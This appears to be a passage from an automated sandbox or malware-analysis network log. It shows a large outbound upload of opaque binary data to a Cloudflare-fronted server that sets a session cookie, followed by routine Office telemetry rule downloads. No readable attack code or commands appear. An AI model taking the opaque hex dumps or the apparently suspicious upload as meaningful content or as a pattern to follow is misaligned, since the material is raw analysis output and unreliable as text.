                                                                                                                                                                                  2024-11-23 18:52:34 UTC15331OUTData Raw: 6f e6 9a fa b1 04 f7 1f 3d 7d 51 c3 b1 8d fb 30 b5 50 3e 83 bb 59 2d d3 8d d7 5a 8e e1 85 2b 15 06 99 ea 53 6f 4b 01 65 72 5c eb 76 45 4b a6 f5 c0 89 d5 9c b3 c1 d4 5a 26 16 fe c9 f1 99 39 58 3e 5c b3 17 07 17 d6 54 77 55 95 2f fe 38 0c 4e b6 1c ee 33 ed 29 b8 3a f3 ea 58 ff ff df 06 60 9f 58 e2 01 df 06 cf 62 21 6e 63 e7 2e dd 62 c4 e1 6f b0 b8 2c af fd 7b 87 65 80 3d d0 ec 70 01 a5 68 d0 48 26 f7 e8 00 af 26 2e f8 00 43 b7 4e 1f 8d f5 4e 66 16 ea f8 ed 45 6d 3f ac 5e 39 cf 05 55 5a 84 1d c8 fd 5d ba 94 e9 32 e0 fd 31 83 ca cb 02 80 7f a7 db 5c 8b cf 30 5d 6c ae 4e 8d 49 e5 c7 3c d9 28 4c 84 de f4 2b 8d f3 e6 5f 42 18 6a 76 23 5c fc 53 40 73 fb 6c a0 fe 03 03 97 25 d3 54 6f cc b4 5a 1f 3c c5 d5 55 5e 80 85 11 29 56 58 72 20 ed e5 3e af 5d 24 bf aa 96 9c
                                                                                                                                                                                  Data Ascii: o=}Q0P>Y-Z+SoKer\vEKZ&9X>\TwU/8N3):X`Xb!nc.bo,{e=phH&&.CNNfEm?^9UZ]21\0]lNI<(L+_Bjv#\S@sl%ToZ<U^)VXr >]$
                                                                                                                                                                                  2024-11-23 18:52:34 UTC15331OUTData Raw: 40 39 3f 9e 6d 11 af 83 c7 0a 83 3b 57 a1 ec c6 50 67 f8 d8 f8 64 31 22 f0 58 42 87 6d 9a b2 33 c4 5d 07 43 dd 77 13 85 83 94 db 5a f2 90 1a bb ac 17 6a 75 ee 5f b3 cb 5c 7f 45 56 3c 17 a7 9d 12 a4 fa 6d 40 63 3b 4b b5 3e c1 d9 99 47 b6 c8 ba d7 3e a6 29 5b ba 80 be 48 01 6c 24 c6 ab f4 b1 d5 82 b0 21 85 a2 5d 75 db 5c df a9 a3 43 e4 7e 83 53 1d 84 0a df fc af 35 31 37 a5 ad d1 5f 98 bf ef d1 d0 f3 f2 42 c5 55 3a dd 72 f8 3a cf c9 3b 0c 65 45 f0 ec 04 97 54 c1 8e be 09 cc bd 8b ea 35 ff 14 04 2b 60 65 85 5a a5 22 11 1d 16 a9 9f 8e 9e 37 ec 5e 73 b9 1a c1 07 31 ee 5c 3b 48 e5 dd ba b2 93 1a a2 51 e1 3c 6f cb 2c a0 2d 9e 63 31 a3 04 2a 70 32 81 8c 9d 65 ab e4 8a 3f fe ce 0d 14 2b cf be 0e f0 93 01 9d 1b fd 03 c2 56 f6 bf da b4 26 a4 ac 2a 1c 4b 62 09 33 7a
                                                                                                                                                                                  Data Ascii: @9?m;WPgd1"XBm3]CwZju_\EV<m@c;K>G>)[Hl$!]u\C~S517_BU:r:;eET5+`eZ"7^s1\;HQ<o,-c1*p2e?+V&*Kb3z
                                                                                                                                                                                  2024-11-23 18:52:34 UTC15331OUTData Raw: 0c ac 2f 1f a2 a6 cd 9d da b7 b4 d2 a4 68 99 52 3d 75 1b 47 a1 d6 ec 07 e3 ee 61 bb ee d7 fc 52 e5 66 e0 2b e8 a9 eb 5a ec 95 f4 05 f3 11 2c 41 81 df b4 f5 ee 2b 5d 24 6d f1 f3 3e bf 06 23 4a 68 0d 04 bb 13 ee 22 5c fa 1b 49 4e 55 90 5e 1f ce 9f de 92 5d 39 3f 5d 93 3e 0c 07 9c a5 30 c7 2d 12 a3 cd d8 41 5a e3 6b 23 81 4f a8 f1 2d f6 d5 45 38 a8 b3 e2 53 78 19 f9 cc f1 97 16 59 a7 0c b8 ea 05 de e3 34 7d 40 fa 6b 7f e9 b3 dd a1 2f 9b f1 a7 5d 9e e9 51 0c 27 ed 0b b9 91 a6 07 b6 74 e3 d4 f3 6d 2f b1 98 4f 59 76 06 bb 61 00 67 23 07 5e 6d 49 f9 01 ce 96 b8 b6 f7 d6 8f 97 14 11 32 31 6e 2b 5c 9d ed 6e c4 0b 24 c6 69 1e 4d 61 ad 0a b9 30 5f c5 3f 61 73 46 36 8a 35 5e 4c 1d c0 f7 e7 8c e8 12 0f 88 16 40 1f 71 2c 9b 58 9f 92 86 93 fd bb 47 0c 83 aa b1 b0 78 7a
                                                                                                                                                                                  Data Ascii: /hR=uGaRf+Z,A+]$m>#Jh"\INU^]9?]>0-AZk#O-E8SxY4}@k/]Q'tm/OYvag#^mI21n+\n$iMa0_?asF65^L@q,XGxz
                                                                                                                                                                                  2024-11-23 18:52:34 UTC15331OUTData Raw: 3b 73 0f 85 11 03 31 33 40 30 82 7a 06 00 7b 64 06 d2 87 4c 02 d1 45 a2 1b f5 7f df 00 07 41 af 01 b5 30 9a f4 bf 3b 82 cd 60 c0 33 9b a7 2c 7f 79 09 c5 f5 b6 c2 d4 0a 5f f8 f9 8b e0 f4 f2 14 6d d8 fd 25 77 d2 27 00 29 5d 4e 05 44 3e be 6d ce 85 5e 40 18 a2 fe ca f1 89 80 6b a0 41 ff 5c bb 53 a5 d9 8b 88 e0 45 1a c1 7e 51 24 32 a8 7f f0 85 14 b3 64 42 51 59 64 77 7f 15 e3 2c 11 dc 03 d8 66 bc 67 39 72 88 14 4d d4 11 05 77 1c 8d 33 88 9b ef d6 d4 bb 40 7c d6 43 a1 ec 64 f4 ae 41 57 c1 54 11 42 63 b8 96 f0 59 aa 99 65 f6 a2 91 e3 8b 07 cf 22 41 6c a3 6a 4e 86 25 bd e8 52 aa b0 71 9d 01 11 7a 2f 2d b0 77 ff ee c3 bb c5 d3 ee 4e ce c6 cf 59 70 33 9a d5 09 2d f6 ad 2b 1a 23 58 d7 af 88 7b b3 a0 f8 ba 92 3f 6b 26 1e 9f ce 37 dd 6c 74 c7 0d 09 fb 05 f5 2b c3 04
                                                                                                                                                                                  Data Ascii: ;s13@0z{dLEA0;`3,y_m%w')]ND>m^@kA\SE~Q$2dBQYdw,fg9rMw3@|CdAWTBcYe"AljN%Rqz/-wNYp3-+#X{?k&7lt+
                                                                                                                                                                                  2024-11-23 18:52:34 UTC15331OUTData Raw: 2f d6 d1 f5 0e 13 55 fd d4 96 e5 8e 53 82 4b 1f 9c 78 97 56 ae bb 98 e0 92 42 7d 43 19 d3 3a 84 60 71 fd 74 83 73 be f0 7b 82 bc f8 4e 58 36 0a d7 2d 9b bd 1f 34 84 54 1d 16 11 15 10 0d 3a 12 73 fc 09 e8 38 9a bd 1f 5d 4c 6a 3d 8b ca 39 ae 7a 1a 4f 3a e0 ce 77 ad c9 e1 c8 f7 9c 2f 6a c8 2e d1 ec 2b f4 b6 79 fd b9 43 3e ad d2 c6 a9 29 e2 12 f7 fa ae a3 4d a2 9d a5 a3 3e 3f 51 bd 7a a0 ee 1a b1 02 59 c2 9f e4 e5 c0 8b 82 e8 b8 07 e1 65 d4 c5 1d da 6e fb 15 63 fc 74 06 ad ac e5 e7 be 73 a7 99 76 fe 7e 08 60 c9 e0 fb 29 b4 ad 1c b0 44 8e ef 0e 99 97 f1 8f 2b 61 03 da d4 97 bd 71 18 13 47 00 81 1b e6 c0 f1 2a 76 1a 7f ec 32 20 dd 0a 25 f7 aa 79 c7 e1 c5 a1 4a bb f5 d5 ff 0e bf 8d be 96 67 25 a6 6c 73 cf b3 f8 f6 56 6b a6 e8 05 b6 82 f5 26 4d c5 89 70 df b2 58
                                                                                                                                                                                  Data Ascii: /USKxVB}C:`qts{NX6-4T:s8]Lj=9zO:w/j.+yC>)M>?QzYenctsv~`)D+aqG*v2 %yJg%lsVk&MpX
                                                                                                                                                                                  2024-11-23 18:52:34 UTC15331OUTData Raw: 9f 6a ad e7 3c ab 56 1a 21 0f ad 47 3b fb db 88 53 ab 8b c1 e7 25 5b a9 6a fe f7 72 46 e3 28 d0 3f d5 08 2d 3f 5f 90 94 f9 e5 5f 2c ed ab 07 cc de 74 3f ed eb 3c cf a7 53 c7 5f 68 20 45 d1 70 b8 80 ca dd 66 3b 15 8d 89 45 47 c1 b7 a1 83 da 1e fa 1f 4d 58 ad 4d bf b4 cd ff 20 68 d7 c6 69 08 e8 fd 1c 92 06 f3 e2 58 a8 34 b1 e2 da 9b 3b 13 04 27 a0 42 77 01 25 85 02 19 6d 6e dd 6d e2 c2 67 42 09 e6 f0 df 77 90 56 ce e0 2e b2 6c 14 3e 2f 03 1e ca 50 9e bf a4 1c 41 bf cb 8c ff 72 82 10 cb e9 97 a4 18 86 fe 1b 7f 0a 58 9d 5d db 6b d5 ae 85 e0 d9 31 58 d4 27 e8 a6 ec 64 7d a6 9e dd 74 b5 0b 9a 65 76 b8 14 e8 39 4c 03 9d a5 d1 8b 77 20 b6 3e cd 2c da db f0 50 7d ba 92 28 be ef 10 f6 00 ab 63 2b a4 2f 69 49 4a 70 03 cd 3c 62 6b ba db 5c 1f 22 28 13 9a 60 50 3f b3
                                                                                                                                                                                  Data Ascii: j<V!G;S%[jrF(?-?__,t?<S_h Epf;EGMXM hiX4;'Bw%mnmgBwV.l>/PArX]k1X'd}tev9Lw >,P}(c+/iIJp<bk\"(`P?
                                                                                                                                                                                  2024-11-23 18:52:34 UTC15331OUTData Raw: 79 f9 28 8a 79 f5 f3 26 92 70 e4 24 d1 02 19 0e df 3c bd 9d d3 a6 82 82 b9 5f 4d a2 b7 3e 16 d0 a7 e8 45 d3 e2 5a 08 46 e1 3c b3 19 03 2a 2a b3 d3 ad 76 81 62 b3 90 33 5b 87 87 f8 b4 cb 49 59 8a 12 22 5d 3a 81 90 00 12 04 08 b4 aa ef a1 fe 62 af c9 4e 10 e5 f5 2f 33 dd 1b 5e 87 61 1d f9 89 be 79 05 9d 6a fa 8b ff 2a 04 63 22 82 dd f8 0e 0d 8e 57 11 6c f7 c1 fb e1 4f ad 6f 6c a6 be 8c c8 56 c3 2e 0b d2 4c 15 52 eb 20 eb e9 ad 8d 84 95 fa fe 9f 8a cd 8a 13 45 81 eb 72 79 a2 52 b7 19 8b d1 d8 84 13 0d 58 ed 16 67 0e 6c fd ce 16 b7 3e ce a9 9e b4 26 34 78 72 95 37 8d db 31 f6 20 4e 64 93 ef 01 31 2a d3 80 76 0a 64 af 0c eb 75 c8 fd dc 09 2f cf c4 f6 e8 f4 30 49 18 b0 aa 1b e1 7b f2 cb f1 82 cb fa b2 53 c8 df 43 4d 68 d2 91 6d 93 9f 6c c5 69 c4 b9 09 39 b1 70
                                                                                                                                                                                  Data Ascii: y(y&p$<_M>EZF<**vb3[IY"]:bN/3^ayj*c"WlOolV.LR EryRXgl>&4xr71 Nd1*vdu/0I{SCMhmli9p
                                                                                                                                                                                  2024-11-23 18:52:34 UTC15331OUTData Raw: d8 f0 d3 04 49 6a f5 23 39 bc af a7 08 88 01 2c ff 2f 4c 24 1e f5 91 19 f3 50 fa b1 6b d2 7e 0f 25 43 54 5d c4 5c 1e 5b c1 b7 b9 2d 0f 89 1c 9f b6 4a 24 e6 d5 57 06 78 f3 ba 05 0a c8 25 42 a0 6f ad 5a ad 8a 67 b0 92 d6 65 ab 18 fd ea 49 19 e2 ac 1f 72 1f f2 d7 a0 36 95 9c 2a ae a3 d0 e3 20 48 80 d7 60 8c 5a 7b fa 15 8e 5b e9 3c 24 e0 7b 19 c7 50 22 2b 3f ae cd 44 5b af 63 65 ac bd 89 8a 34 10 13 76 93 90 7e 8a 8f a5 a1 35 48 c8 09 24 45 0c 24 86 e9 7a e4 fe e2 16 6f 82 90 c1 b6 06 9f ff bd 57 bd 05 56 65 04 cf 61 29 b2 b8 de 77 b4 19 6e a3 e1 e3 da 35 b3 a2 3d 8b e1 0e 06 18 4a 46 e3 fb 2e 5c e6 5b 2c bf 6e c3 ca 8b 83 e2 e9 ba a2 ba fb fb 3b 3f 76 80 de 30 ea 15 4c 8e 85 b9 f6 16 e5 89 34 93 ca 2e 25 1f 51 ab dd 14 a2 64 57 09 08 08 e8 9d 3e de d5 d2 e7
                                                                                                                                                                                  Data Ascii: Ij#9,/L$Pk~%CT]\[-J$Wx%BoZgeIr6* H`Z{[<${P"+?D[ce4v~5H$E$zoWVea)wn5=JF.\[,n;?v0L4.%QdW>
                                                                                                                                                                                  2024-11-23 18:52:34 UTC15331OUTData Raw: f1 a3 ac 7c 4b 9c 9b f0 57 5a cd bd 3b bf 74 5e 87 5a 0d 7e ed 45 d2 b3 1b 03 d8 b7 ca 45 ef 12 29 04 df f7 ca 2e f0 46 3b 29 98 3b a8 17 91 46 e9 ba 4b 73 5c 6f b9 4f 8b 8f 8e 8f 48 66 3b 85 15 74 7e 96 94 19 d1 dc 67 7a 78 4b bc 77 7f c3 4b be f9 88 ff 86 a1 a0 93 c2 52 cb a0 d2 93 39 32 de f8 a9 5f 54 8e ff b8 5e af 23 e1 ce 06 be 9d 41 00 37 71 d4 2b 6e c3 54 af 81 14 49 c0 e9 df b2 0d 5d f8 60 6b cc 5e f6 8e 9d d0 89 a3 dd df d2 21 d7 3b 98 cd 46 af 4c ff 96 67 24 4a 0d 9a 9e 7e 78 b7 3a 7b d8 64 78 7b 2e 94 19 9e b5 18 1d bd b2 b1 30 1a 50 db b5 bd f5 aa eb 3a 7b f1 ed 89 d0 fe e1 90 db d5 d1 3f 3e 2c 6c 1a e7 9c 5f d8 ac f6 aa 76 0f db be 36 f8 fe 78 9b 74 a5 7b 91 a3 cc cf 59 c9 5b c3 c5 8b ab 55 8b a7 8b db 86 d2 16 aa 3e fa 07 7d 79 20 80 e4 54
                                                                                                                                                                                  Data Ascii: |KWZ;t^Z~EE).F;);FKs\oOHf;t~gzxKwKR92_T^#A7q+nTI]`k^!;FLg$J~x:{dx{.0P:{?>,l_v6xt{Y[U>}y T
                                                                                                                                                                                  2024-11-23 18:52:40 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:40 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=d1h34lhtomc1uh0se0sol6bv41; expires=Wed, 19-Mar-2025 12:39:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dkdjdwPWcXbceTK9iZtwarrMn6bsJ%2BgNZWBs4FXP5je0niJLIJAGnqqVCJHM1JLjWWF4VPzcptoNLy7MVLot94fW52C7XBdgW6Y9M37peBEbRJeLpRJmrt2k3H7izAG9VQ%2BQfZs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e735b6a2c2f4385-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1786&sent=398&recv=516&lost=0&retrans=1&sent_bytes=4230&recv_bytes=588558&delivery_rate=144540&cwnd=250&unsent_bytes=0&cid=215584fe72c14b79&ts=6719&x=0"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  34192.168.2.74973613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:34 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:35 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 499
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                  ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                  x-ms-request-id: ed298b8a-a01e-0002-322d-3c5074000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185235Z-178bfbc474bbcwv4hC1NYCypys00000004s0000000007dpn
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:35 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  35192.168.2.74973913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:34 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:35 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 471
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                  x-ms-request-id: 9053a11e-c01e-0046-640f-3d2db9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185235Z-178bfbc474bw8bwphC1NYC38b400000004mg00000000h2r0
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:35 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  36192.168.2.74973813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:34 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:35 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 415
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                  x-ms-request-id: 6a83a5f2-e01e-000c-157b-3b8e36000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185235Z-174c587ffdf8lw6dhC1TEBkgs800000003a000000000cxam
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:35 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  37192.168.2.74974013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:35 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:36 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 419
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                  x-ms-request-id: 15a67567-d01e-0066-07eb-3bea17000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185236Z-15b8b599d885ffrhhC1TEBtuv000000003cg00000000beww
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:36 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  38192.168.2.74974213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:35 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:36 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 494
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB8972972"
                                                                                                                                                                                  x-ms-request-id: 3af7945d-501e-0016-1564-3b181b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185236Z-178bfbc474bxkclvhC1NYC69g400000004r000000000hcua
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
